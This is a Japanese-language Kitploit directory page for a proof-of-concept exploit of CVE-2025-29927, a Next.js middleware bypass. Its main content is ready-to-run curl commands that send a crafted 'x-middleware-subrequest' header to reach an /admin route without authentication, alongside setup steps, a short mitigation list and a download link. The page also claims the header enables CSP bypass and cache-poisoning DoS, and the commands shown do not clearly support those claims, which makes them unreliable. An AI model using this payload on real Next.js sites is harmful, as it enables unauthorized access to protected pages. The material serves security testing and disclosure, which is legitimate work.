Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
POC-CVE-2025-29927 — CVE-2025-29927 概念実証 | Kitploit
ツール/GitHubGitHub/eve-satoru/poc-cve-2025-29927
認証と認可脆弱性分析エクスプロイトウェブアプリケーション悪用WAFバイパスウェブセキュリティ
GitHubeve-satoru/poc-cve-2025-29927

POC-CVE-2025-29927

CVE-2025-29927 概念実証

リポジトリを見る
311年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-29927: Next.js ミドルウェアバイパス PoC

概要

この PoC は、Next.js ミドルウェアにおける脆弱性 CVE-2025-29927 を示しています。この脆弱性により、攻撃者は x-middleware-subrequest ヘッダーを使用して認証、認可、CSP メカニズムをバイパスできます。

影響を受けるバージョン

Next.js バージョン 11.1.4 から 15.1.7

セットアップとインストール

1️⃣ PoC をクローンしてインストールする

root@kitploit:~
git clone https://github.com/Eve-SatOrU/POC-CVE-2025-29927.git
cd POC-CVE-2025-29927
cd Demo 
cd my-next-app
npm install
npm run dev

アプリは http://localhost:3000 で起動します

悪用シナリオ

1️⃣ 認証と認可のバイパス (cURL)

  1. x-middleware-subrequest を使用して不正アクセスを取得する:
root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/admin

💥 期待される結果: 認証がバイパスされたにもかかわらず、レスポンスは admin admin を返します。

結果のスクリーンショット

2️⃣ XSS インジェクションのための CSP バイパス

ミドルウェアで CSP が強制されている場合、それをバイパスする:

root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
     -H "Content-Security-Policy: default-src 'self'" \
     http://localhost:3000/admin

💥 期待される結果: CSP が無視され、悪意のあるスクリプトの実行が許可されます。

3️⃣ キャッシュポイズニング DoS (CPDoS) 攻撃

不正なレスポンスを強制してキャッシュポイズニングを悪用する:

root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
     -H "Cache-Control: public, max-age=3600" \
     http://localhost:3000/admin

💥 期待される結果: ページが誤ったコンテンツでキャッシュされ、通常のユーザーに支障をきたします。

緩和策

  • ✅ ミドルウェアロジックを検証してバイパスを防止する。
  • ✅ パッチがリリースされたら Next.js をアップグレードする。

クレジット

🔍 発見者: Allam Rachid (zhero;) & Allam Yasser (inzo_)

ツールをダウンロード